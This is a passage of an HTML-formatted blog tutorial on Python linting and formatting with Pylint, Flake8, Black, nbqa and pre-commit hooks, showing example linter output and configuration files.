&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Self-improvement&lt;/strong&gt;: Getting into the habit of regularly checking your code for stylistic errors will make you a better programmer. Over time you will find that you are becoming less reliant on linters!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This all sounds great!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-python-linting-guide"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="linters-for-python"&gt;Linters for Python&lt;/h2&gt;
&lt;p&gt;We will look at a couple of well-known Python linters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pylint&lt;/strong&gt;: looks for errors, enforces a coding standard that is close to PEP8, and even offers simple refactoring suggestions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flake8&lt;/strong&gt;: wrapper around PyFlakes, pycodestyle and McCabe; this will check Python source code for errors and violations of some of the PEP8 style conventions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It should be noted that Flake8 does not, by default, look for as many PEP8 violations as Pylint (unless you install some plugins). However it can still be beneficial to work with both linters in your project, as we will show below.&lt;/p&gt;
&lt;h3 id="examples"&gt;Examples&lt;/h3&gt;
&lt;p&gt;So now we know what linters are, let&amp;rsquo;s see how to use them in our projects!&lt;/p&gt;
&lt;h4 id="linting-a-python-script"&gt;Linting a Python script&lt;/h4&gt;
&lt;p&gt;For this example we will look at how to lint the following piece of code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Captain&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Picard&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;InitiateWarpSpeed&lt;/span&gt;(order):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; order&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;engage&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; print(&lt;span style="color:#a5d6ff"&gt;&amp;#34;initiating warp speed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; print(&lt;span style="color:#a5d6ff"&gt;&amp;#34;you are not the captain of this vessel&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;InitiateWarpSpeed(&lt;span style="color:#a5d6ff"&gt;&amp;#34;engage&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;em&gt;&lt;strong&gt;Pylint:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s start with Pylint. We can install this with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install pylint
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Conventionally, Pylint is used to analyse a Python module. However, it is also possible to run it on an individual script with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pylint my_script.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The output looks something like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:13:0: C0304: Final newline missing (missing-final-newline)
my_script.py:1:0: C0114: Missing module docstring (missing-module-docstring)
my_script.py:3:0: E0401: Unable to import &amp;#39;pandas&amp;#39; (import-error)
my_script.py:5:0: C0103: Constant name &amp;#34;Captain&amp;#34; doesn&amp;#39;t conform to UPPER_CASE naming style (invalid-name)
my_script.py:7:0: C0103: Function name &amp;#34;InitiateWarpSpeed&amp;#34; doesn&amp;#39;t conform to snake_case naming style (invalid-name)
my_script.py:7:0: C0116: Missing function or method docstring (missing-function-docstring)
my_script.py:1:0: W0611: Unused numpy imported as np (unused-import)
my_script.py:2:0: W0611: Unused import time (unused-import)
my_script.py:3:0: W0611: Unused pandas imported as pd (unused-import)
my_script.py:2:0: C0411: standard import &amp;#34;import time&amp;#34; should be placed before &amp;#34;import numpy as np&amp;#34; (wrong-import-order)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We can see it has flagged some issues with our code. The format with which Pylint displays these messages is:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;{path}:{line}:{column}: {msg_id}: {msg} ({symbol})
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The letter at the start of the message ID indicates the category of the check that has failed. For example, C refers to a convention related check and E to an error. The full list of categories can be found in the &lt;a href="https://pylint.pycqa.org/en/latest/user_guide/message-control.html" rel="external"&gt;Pylint documentation&lt;/a&gt;. One thing to note is that Pylint is telling us with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:3:0: E0401: Unable to import &amp;#39;pandas&amp;#39; (import-error)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;that there is a bug in line three which will cause an error, and it is telling us this before our code has even run!&lt;/p&gt;
&lt;p&gt;If for some reason we decide we want to overrule Pylint and ignore a message for a line of code, we can include the comment &lt;code&gt;# pylint: disable=some-message&lt;/code&gt;. For example, if we really wanted to keep our naming of variable &lt;code&gt;Captain&lt;/code&gt; against the style guide, we could change the line to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Captain &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Picard&amp;#39;&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# pylint: disable=invalid-name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So, linting your scripts with Pylint is a breeze, and it turns out Flake8 is just as easy to use!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Flake8:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This can be installed with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install flake8
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and run using&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;flake8 my_script.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In fact, you don&amp;rsquo;t even have to specify a Python script here! Simply running &lt;code&gt;flake8&lt;/code&gt; will lint all scripts within the current directory and all sub-directories.&lt;/p&gt;
&lt;p&gt;This time, the output is:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:1:1: F401 &amp;#39;numpy as np&amp;#39; imported but unused
my_script.py:2:1: F401 &amp;#39;time&amp;#39; imported but unused
my_script.py:3:1: F401 &amp;#39;pandas as pd&amp;#39; imported but unused
my_script.py:5:8: E225 missing whitespace around operator
my_script.py:7:1: E302 expected 2 blank lines, found 1
my_script.py:8:13: E225 missing whitespace around operator
my_script.py:13:1: E305 expected 2 blank lines after class or function definition, found 1
my_script.py:13:28: W292 no newline at end of file
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This differs somewhat with the output from Pylint:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Flake8 is flagging lots of issues related to whitespace and blank lines;&lt;/li&gt;
&lt;li&gt;Pylint is identifying violations with naming conventions and layout (docstrings, import order, etc);&lt;/li&gt;
&lt;li&gt;Both linters are pointing out unused imports.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You may prefer one of these linters over the other, or you could be extra-diligent and opt to work with &lt;em&gt;both&lt;/em&gt; linters for your project!&lt;/p&gt;
&lt;p&gt;If you want Flake8 to ignore a particular line of code, you can just add a comment &lt;code&gt;# noqa&lt;/code&gt; at the end. To ignore a particular error, you can use, for example, &lt;code&gt;# noqa: F401&lt;/code&gt; to ignore an unused import.&lt;/p&gt;
&lt;p&gt;You can also configure Flake8 so that it will only flag particular errors. One way to do this is by adding a setup.cfg file to your working directory. Let&amp;rsquo;s say you want to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;set the maximum line length to be 88;&lt;/li&gt;
&lt;li&gt;ignore the E302 blank line flags;&lt;/li&gt;
&lt;li&gt;ignore the F401 flag for my_script.py only.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The contents of setup.cfg would then be:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[flake8]
max-line-length = 88
extend-ignore =
E302,
per-file-ignores =
my_script.py:F401
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Running Flake8 then gives a reduced output:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;my_script.py:5:8: E225 missing whitespace around operator
my_script.py:8:13: E225 missing whitespace around operator
my_script.py:13:1: E305 expected 2 blank lines after class or function definition, found 1
my_script.py:13:28: W292 no newline at end of file
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="linting-in-an-editor"&gt;Linting in an editor&lt;/h4&gt;
&lt;p&gt;In the last example we showed how to lint Python scripts from the command line. However, we might want to see potential issues with our code as we are writing it, enabling us to correct things instantly. In order to do this we can configure a linter with a text editor. In this example we will go through how to do this for VSCode.&lt;/p&gt;
&lt;p&gt;In VSCode we can set our linter preference by opening the command palette with &lt;code&gt;Ctrl+Shift+P&lt;/code&gt; and clicking on &lt;code&gt;Python: Select Linter&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can then select which linter we want to use. If &amp;lsquo;Pylint&amp;rsquo; is selected, for example, the setting&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;#34;python.linting.pylintEnabled&amp;#34;: true
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;will then be added to the &lt;code&gt;settings.json&lt;/code&gt; file in the &lt;code&gt;.vscode&lt;/code&gt; config.&lt;/p&gt;
&lt;p&gt;Potential issues will now be underlined upon saving our script, similar to a spell checker:&lt;/p&gt;
&lt;p&gt;&lt;img alt="linted code" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-linting-guide/code_snapshot.png" width="724"&gt;&lt;/p&gt;
&lt;p&gt;If you hover over a line, the message associated with this problem will be displayed. The full list of issues can also be viewed in the &amp;ldquo;PROBLEMS&amp;rdquo; bar of the VSCode terminal window.&lt;/p&gt;
&lt;h4 id="linting-a-jupyter-notebook"&gt;Linting a Jupyter Notebook&lt;/h4&gt;
&lt;p&gt;Jupyter notebooks can be a great tool for learning, running experiments and checking pieces of code. However, they do pose some difficulties when it comes to version control and running checks such as linting and formatting.&lt;/p&gt;
&lt;p&gt;An easy way to apply linters to Jupyter notebooks is with the &lt;strong&gt;nbqa&lt;/strong&gt; package. This can be installed with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install nbqa
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;or&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;conda install -c conda-forge nbqa
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This enables you to then run a range of code styling tools on notebooks in a similar way to scripts. For example, to use Pylint on a notebook you simply have to run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;nbqa pylint my_notebook.ipynb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Note, you will need to separately install any tool you want to use with nbqa.&lt;/p&gt;
&lt;h2 id="auto-formatters-in-python"&gt;Auto-formatters in Python&lt;/h2&gt;
&lt;p&gt;Linters are perfectly fine for dealing with imperfections for which there is a clear and simple fix, like renaming a variable from &lt;code&gt;CamelCase&lt;/code&gt; to &lt;code&gt;snake_case&lt;/code&gt;. But they would not be able to, for example, split a long line of code into several shorter lines. Instead, this can be done with an auto-formatter, which can change your code to follow certain formatting guidelines. These guidelines dictate things such as where tabs, spaces and new lines are used in code.&lt;/p&gt;
&lt;p&gt;We will consider a popular auto-formatter called &lt;strong&gt;Black&lt;/strong&gt;. Black reformats entire files in place, applying its own PEP8-compliant coding style which is detailed &lt;a href="https://black.readthedocs.io/en/stable/the_black_code_style/current_style.html" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="examples-1"&gt;Examples&lt;/h3&gt;
&lt;h4 id="formatting-a-python-script"&gt;Formatting a Python script&lt;/h4&gt;
&lt;p&gt;Black can be installed by running&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install black
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and run with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;black my_script.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Let&amp;rsquo;s say your script contains a long line of code, like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;long_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#39;this&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;list&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;contains&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;too&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;many&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;elements&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;for&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;one&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;line&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Black will change this to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;long_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;this&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;list&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;contains&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;too&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;many&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;elements&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;for&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;one&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can see the list has been split up so each element is on a different line, making it easier to read. Furthermore, the single quotation marks have been changed to more conventional double quotations.&lt;/p&gt;
&lt;p&gt;It should be noted that Black will only change the appearance/formatting of your code. It will not, for example, flag posssibe errors or remind you to put in a docstring.&lt;/p&gt;
&lt;h4 id="auto-formatting-a-jupyter-notebook"&gt;Auto-formatting a Jupyter notebook&lt;/h4&gt;
&lt;p&gt;To format a notebook using Black you can again use the nbqa package:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;nbqa black my_notebook.ipynb
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We can also integrate Black with Jupyter notebooks using the Black notebook extension, &lt;strong&gt;nb_black&lt;/strong&gt;. You can install this with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install nb_black
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and then use it in a Jupyter notebook by running the following magic command in a cell:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-ipython" data-lang="ipython"&gt;%load_ext nb_black
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now, whenever we run a code block it will be formatted with the Black style guide!&lt;/p&gt;
&lt;p&gt;If you want to have Black formatting enabled in your notebooks automatically (i.e. without having to run the magic command) you can set this in the ipython config. You can create an initial template ipython config by running:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;ipython profile create
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This by default should create some config files at the location &lt;code&gt;~/.ipython/profile_default/&lt;/code&gt;. In the &lt;code&gt;ipython_config.py&lt;/code&gt; file you then need to add the lines,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; get_config()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;c&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;InteractiveShellApp&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;extensions &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;nb_black&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Black formatting will now be enabled automatically whenever you use a Jupyter notebook.&lt;/p&gt;
&lt;h2 id="pre-commit-hooks"&gt;Pre-commit hooks&lt;/h2&gt;
&lt;p&gt;So, we now know how to use linters and auto-formatters, and we have realised just how useful these are! The next step is to start enforcing their use in our projects. This can be done using pre-commit hooks. Pre-commit hooks enable us to check our code for style and formatting issues each time a change is commited, thus ensuring a uniform style is maintained throughout the entirety of a project.&lt;/p&gt;
&lt;p&gt;The pre-commit package manager can be installed with&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pip install pre-commit
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the root of our GitHub repo, we then need to create a file called &lt;code&gt;.pre-commit-config.yaml&lt;/code&gt;. This file is where we will specify the checks we want to run before each commit. Below is an example which uses some hooks from the pre-commit-hooks &lt;a href="https://pre-commit.com/hooks.html" rel="external"&gt;repo&lt;/a&gt; as well as Black formatting.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;repos&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;- &lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;repo&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;https://github.com/pre-commit/pre-commit-hooks&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;rev&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;v3.2.0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;hooks&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;trailing-whitespace&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;end-of-file-fixer&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;- &lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;repo&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;https://github.com/psf/black&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;rev&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;21.&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7b0&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;hooks&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;black&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once we have created our &lt;code&gt;.pre-commit-config.yaml&lt;/code&gt; file we can then run&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;pre-commit install
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now, whenever the command &lt;code&gt;git commit&lt;/code&gt; is run, the pre-commit hooks will automatically be applied!&lt;/p&gt;
&lt;p&gt;It is also possible to add pre-commit hooks for notebooks with nbqa. For example with the following &lt;code&gt;pre-commit-config.yaml&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;repos&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;- &lt;span style="color:#7ee787"&gt;repo&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;https://github.com/nbQA-dev/nbQA&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;rev&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1.3.1&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;hooks&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;nbqa-black&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;additional_dependencies&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;black==21.7b0]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;id&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;nbqa-pylint&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
